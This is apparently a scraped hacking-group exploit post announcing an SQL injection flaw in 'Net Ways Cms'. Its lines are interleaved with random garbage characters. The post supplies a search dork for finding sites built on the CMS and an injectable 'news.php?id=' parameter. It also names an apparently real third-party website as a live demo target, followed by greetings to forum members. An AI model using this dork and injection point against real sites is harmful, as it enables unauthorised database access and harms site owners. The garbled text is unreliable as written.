################################################################################??######## : V7 K1 [9 }4 B" M
#
& z) i3 c& H6 { H# Exploit Title : Net Ways Cms Sql Injection Vulnerability / g) q: H/ ?& S9 r
# # o# h, ~5 H% Y% O5 m# L7 R
# Author : IrIsT.Ir
" V: p. k4 g. Q* [#
. C' m( F/ u9 b+ ~! [ k& {# Discovered By : Am!r
5 ]6 @) ]% L7 a* d; f( t6 I# `#
' |, z6 Q( T6 A' z Q* C6 X# Home : http://IrIsT.Ir/forum 1 a+ e2 C6 h" R+ U
#
9 F' [2 i# S3 I) l/ S: w; P# Software Link : http://www.netways.com/ www.political-security.com# z, x1 v. C/ Y7 x' G
#
8 ^3 B0 |/ V. d4 }" Q. I" T# Security Risk : High
+ _3 ]0 _$ V: X#
& H! o3 K. I. ~4 ]3 W- d# Version : All Version
9 l) w* U: g) W. v! B0 c. B#
: ?9 g c1 |6 w5 i9 d4 V0 A3 x; P i) o# Tested on : GNU/Linux Ubuntu - Windows Server - win7
1 [! F {! F1 l1 `# o. Y O; E#
" c. r" x& f' W/ k Z% e5 Z$ v0 Y) q5 L0 h# Dork : intext:"Designed & developed by NetWays"
9 h C' c! a) {' B5 I# + b, \6 A! `+ \
################################################################################??########
2 ?6 S5 R- |* b# 7 E* {5 Q7 Y! a
# Expl0iTs : - j3 O Z1 e1 a& Q
# ( H1 R9 u9 O; `8 Q" g9 t; A: {
# http://target.com/news.php?id=[Sql] & I) l+ ~4 Y; Q: r! X( Q4 q2 K; t
# 3 P/ [" }0 k/ @7 e! x! ]! x8 d7 I
# , u ]) M; o4 d7 q
# D3mo : o( i* M! y$ ~/ Z2 c9 `# |% X
#
. B- q! ^! q- @8 G& E# http://compagnieparento.com/news.php?id=7[Sql] - Q" ~3 P& s# V1 p9 F0 R, V0 A
# 4 R$ m/ Y/ r4 A( \# Y0 g* U
################################################################################??########
9 Y4 h3 C! ]& G3 f) r#
& |8 S% s$ N) b$ q0 E. |# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r / `; z/ x$ m. ~3 ?. `
#
( w h' {8 u& N9 R' S# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r , b( ?- ]. ^, A. w( E. @
# % a: ]- ^# H6 X" u$ X* ^
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
2 C+ D1 r- j0 T- q$ q5 V) ~! F" o#
$ z' ~1 d5 r1 K; y; u6 [7 ?% _- k################################################################################??######## |